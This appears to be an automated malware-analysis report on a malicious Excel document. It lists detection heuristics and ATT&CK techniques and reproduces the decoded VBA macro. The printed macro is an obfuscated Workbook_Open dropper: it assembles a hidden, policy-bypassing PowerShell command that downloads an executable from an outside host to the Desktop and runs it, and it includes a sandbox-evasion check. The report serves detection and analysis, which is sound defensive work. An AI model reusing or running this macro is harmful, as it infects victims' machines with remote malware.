MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample is a malicious Excel file containing a Workbook_Open macro that utilizes the Shell() function. The macro constructs a URL by concatenating strings and then uses the .NET WebClient to download and execute a second-stage payload from this URL. The reconstructed URL is "http://momerton.com/pager".
Heuristics 5
-
ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2737 bytes |
SHA-256: a7f0c3e49fbc08e065b5c80d5ae388322856273410ade102aa43236c006df653 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function luaasiaa()
luaasiaa = "Op" + "roF" + "I -W"
End Function
Function majikoloa()
teesdeef = "(\""{" + "0}" + "{2"
majikoloa = teesdeef + "}{1}{" + "3}{" + "5}{6}" + "{4}\""-f'Sy','" + "te','s" + "','m" + ".Ne" + "','ent'" + ",'t.We" + "b','Cli')).dowN" + "LOadFiL" + "E.iNVoKE(\""ht"
End Function
Function stakabills()
stakabills = "$7d0m" + "K6 = [Typ" + "E](\""{1}{" + "0}{3}{2}\"" -f 'on','E" + "nVIr','Nt','ME') ; "
End Function
Function fuokalabel()
If 191 > 100 Then
blackandfiire = "eR"
fuokalabel = blackandfiire + "shE"
End If
End Function
Function deomitriss()
deomitriss = "d" + "o{&(" + "\""{1}{" + "0}\"" -f'ep'" + ",'sle'" + ") 33;" + "${D`es} = " + gloglue + "::gET" + "fo" + "lD" + "eRP" + "aTH(\""De" + "skt" + "op\"");(&(" + "\""{" + "0}{1}{2}\"" -f" + "'Ne','w-','O" + "bject') "
End Function
Function gloglue()
If 1234 > -56 Then
gloglue = "$7d" + "0mk6"
End If
End Function
Function attos()
Dim favekoliss As String
Randomize
favekoliss = Int(Rnd * 7890090#)
sedefegol = "while(!${?});" + "&(\""{0}{2}{3}{1}\""-f 'St','oces" + "s','art','-Pr') $Des\" + favekoliss + ".exe"""
berderelovic = majikoloa + "tp://momer" + "ton.com/pa" + "ger\"",\""$Des\" + favekoliss + ".exe\"")}"
attos = berderelovic + sedefegol
End Function
Sub Workbook_Open()
If sigdetNumberOfMonitors > 1 Then
paparazzzi = stakabills + deomitriss + attos
faramall = wolfandcat & paparazzzi
Shell faramall, BackstageGroupStyleNormal
End If
End Sub
Function wolfandcat()
If sigdetDocPreviewImg > 2 Then
tumerasdwr = "noN" + "InT"
smugleoddf = " -N"
apogeuses = "cm"
sandermenus = Array(Hour(Now), "DEN", Second(Now))
trnadeok = Array(Now(), "ass " + " """, Minute(Now), Minute(Now), "d " + "/c""", Now())
wolfandcat = apogeuses + trnadeok(4) + "pOW" + fuokalabel + "Ll -n" + luaasiaa + "In hiD" + sandermenus(1) + smugleoddf + "OLo -" + tumerasdwr + "eRA -eX" + "eCU" + "TI" + "oNp bYp" + trnadeok(1)
End If
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.